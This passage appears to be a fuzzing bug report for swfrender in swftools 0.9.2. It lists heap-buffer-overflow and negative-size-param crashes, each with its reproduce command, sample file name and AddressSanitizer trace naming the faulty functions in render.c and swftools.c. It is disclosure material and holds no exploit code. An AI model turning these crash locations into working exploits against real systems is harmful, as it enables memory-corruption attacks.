    SUMMARY: AddressSanitizer: heap-buffer-overflow modules/swftools.c:509 in enumerateUsedIDs_fillstyle
    Shadow bytes around the buggy address:
      0x0c0e7fff8020: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa 00 00
      0x0c0e7fff8030: 00 00 00 00 00 00 03 fa fa fa fa fa 00 00 00 00
      0x0c0e7fff8040: 00 00 00 00 03 fa fa fa fa fa 00 00 00 00 00 00
      0x0c0e7fff8050: 00 00 03 fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c0e7fff8060: 00 00 fa fa fa fa 00 00 00 00 00 00 00 00 00 04
    =>0x0c0e7fff8070: fa fa fa fa 00 00 00 00 00 00 00 00 00[03]fa fa
      0x0c0e7fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==1106906==ABORTING
    

**2.negative-size-param****env**

ubuntu20.04

gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)

swfrender - part of swftools 0.9.2

**sample**

id107\_negative-size-param.zip

**crash**

    ./swfrender id107_negative-size-param -o /dev/null
    =1148866==ERROR: AddressSanitizer: negative-size-param: (size=-21465837888)
        #0 0x7fe31237dfdd in __interceptor_memset ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762
        #1 0x559b516b3c75 in memset /usr/include/x86_64-linux-gnu/bits/string_fortified.h:71
        #2 0x559b516b3c75 in newclip devices/render.c:538
        #3 0x559b516b41e1 in render_startpage devices/render.c:936
        #4 0x559b516348e1 in main /mnt/hgfs/ubuntu/cve/swftools/swftools-master/src/swfrender.c:217
        #5 0x7fe311fdd082 in __libc_start_main ../csu/libc-start.c:308
        #6 0x559b51632ecd in _start (/mnt/hgfs/ubuntu/cve/swftools/swftools-master/src/swfrender+0x24ecd)
    
    0x7fe2fef21800 is located 0 bytes inside of 8998592-byte region [0x7fe2fef21800,0x7fe2ff7b66c0)
    allocated by thread T0 here:
        #0 0x7fe312423a06 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:153
        #1 0x559b516d0bc1 in rfx_calloc /mnt/hgfs/ubuntu/cve/swftools/swftools-master/lib/mem.c:69
    
    SUMMARY: AddressSanitizer: negative-size-param ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762 in __interceptor_memset
    ==1148866==ABORTING
    

**3.heap-buffer-overflow****env**

ubuntu20.04

gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)

swfrender - part of swftools 0.9.2

**sample**

id157\_heap-buffer-overflow.zip

**crash**

    ./swfrender id157_heap-buffer-overflow -o /dev/null
    =1167329==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fb50bafcc00 at pc 0x7fb50f696f3d bp 0x7fffa3c52d40 sp 0x7fffa3c524e8
    WRITE of size 16 at 0x7fb50bafcc00 thread T0
        #0 0x7fb50f696f3c in __interceptor_memset ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762
        #1 0x55ca7b7620cc in memset /usr/include/x86_64-linux-gnu/bits/string_fortified.h:71
        #2 0x55ca7b7620cc in render_startpage devices/render.c:922
        #3 0x55ca7b6e28e1 in main /mnt/hgfs/ubuntu/cve/swftools/swftools-master/src/swfrender.c:217
        #4 0x7fb50f2f6082 in __libc_start_main ../csu/libc-start.c:308
        #5 0x55ca7b6e0ecd in _start (/mnt/hgfs/ubuntu/cve/swftools/swftools-master/src/swfrender+0x24ecd)
    
    0x7fb50bafcc00 is located 0 bytes to the right of 13906944-byte region [0x7fb50adb9800,0x7fb50bafcc00)
    allocated by thread T0 here:
        #0 0x7fb50f73c808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
        #1 0x55ca7b77eab9 in rfx_alloc /mnt/hgfs/ubuntu/cve/swftools/swftools-master/lib/mem.c:30
        #2 0x7fb50f2f6082 in __libc_start_main ../csu/libc-start.c:308
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:762 in __interceptor_memset
    Shadow bytes around the buggy address:
      0x0ff721757930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0ff721757940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0ff721757950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0ff721757960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0ff721757970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0ff721757980:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff721757990: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff7217579a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff7217579b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff7217579c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0ff7217579d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==1167329==ABORTING

Tag

#linux